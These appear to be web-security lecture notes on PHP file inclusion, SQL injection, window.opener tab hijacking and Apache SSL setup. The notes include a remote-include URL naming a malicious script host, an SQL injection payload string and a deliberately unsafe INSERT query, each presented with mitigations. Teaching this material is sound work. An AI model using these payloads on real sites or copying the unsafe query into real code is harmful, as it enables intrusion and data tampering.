CS174
Chris Pollett
Apr 26, 2017
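<html><head>...</head>
<body>
  <div id="leftcolumn">
    <ul>
      <li><a href="?c=n.html">News</a></li>
      <li><a href="?c=d.html">Discussions</a></li>
    </ul>
  </div>
  <div id="content">
    <?php
    // The c query parameter comes from the request, so it must never reach
    // include() unchecked: include() runs whatever file it is given as PHP,
    // and an unchecked value could name any local path or, where
    // allow_url_include is enabled, a remote URL.
    // Only the pages linked from the menu above are accepted; anything else
    // (missing, unknown, or an array such as c[]=x) falls back to default.php.
    $allowed_pages = array("n.html", "d.html");
    if (isset($_GET['c']) && in_array($_GET['c'], $allowed_pages, true)) {
        include($_GET['c']);
    } else {
        include("default.php");
    }
    ?>
  </div>
</body>
</html>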
http://somewhere.com/?c=http://www.mymalicioussite.com/evilscript.php
// Builds the INSERT statement by pasting $_POST values directly into the SQL text.
// Nothing is escaped or bound, so a quote character in a submitted field ends the
// string literal and the remainder of the field is parsed as SQL (SQL injection).
// Mitigation: keep the statement text constant and pass the three values as bound
// parameters of a prepared statement rather than interpolating them.
// NOTE(review): the second value is written differently from the other two (no
// braces, no surrounding quotes, and a $ inside the key) — it looks like a typo
// for the reg_password field; confirm against the original slide.
$sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('{$_POST['reg_username']}', $_POST[ '$reg_password'], '{$_POST['reg_email']}')";
bad_guy', 'mypass', ''), ('good_guy?
<script>
  // Demonstration: a tab opened with window.open() gets a window.opener
  // reference back to this page, and script running in that tab can use
  // the reference to rewrite this page's document.
  document.write("<button onclick='childOpener()'>Open Child Tab</button>");

  // Opens a blank child tab and writes a small page into it whose button
  // overwrites the parent tab through window.opener.
  function childOpener() {
    // aside: replace "" with some url if you want to open the tab at a
    // different site
    var popup = window.open("", "_blank");

    // Markup for the child tab. The closing script tag is split across two
    // strings so the HTML parser does not treat it as the end of this script.
    // NOTE(review): the child calls document.stop() on the opener, while the
    // code below calls stop() on the window object — confirm which was meant.
    var childMarkup = [
      "<!DOCTYPE html>",
      "<html><head><title>Child Script Test</title></head>",
      "<body>",
      "<p><button onclick='changeParent()'>Change Parent</button></p>",
      "<script>",
      "function changeParent() {",
      " window.opener.document.write('<p>New content for parent tab</p>');",
      " window.opener.document.stop()",
      "} <",
      "/script></body></html>"
    ].join("");

    popup.document.write(childMarkup);
    popup.stop();
    popup.focus();
  }
</script>
<!-- rel="noopener" opens the new tab without a window.opener reference, so the
     destination page cannot script or navigate this one; "noreferrer" also
     withholds the Referer header from the destination. -->
<a href="http://somewhere.com/" target="_blank" rel="noopener noreferrer">Go Somewhere</a>
# Load mod_ssl, the module that provides Apache's SSL/TLS support.
LoadModule ssl_module libexec/apache2/mod_ssl.so
server.key and server.crt
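# Generate the server's RSA private key, encrypted with a passphrase (-des3).
# 2048 bits is used because 1024-bit RSA keys are no longer considered strong
# enough and are rejected by current browsers and certificate authorities.
openssl genrsa -des3 -out server.key 2048
# Create a certificate signing request (CSR) for that key.
openssl req -new -key server.key -out server.csr
# Sign the CSR with the server's own key, producing a self-signed certificate
# valid for 365 days. Clients will warn about it unless they are told to trust
# it, so this is for testing; a public site needs a CA-issued certificate.
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt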
openssl s_client -crlf -connect pollett.org:443
...This will print information about the establishment of the SSL connection, including the SSL certificate and handshake, after which you can enter normal HTTP commands...
GET / HTTP/1.1
Host: pollett.org
...get web page...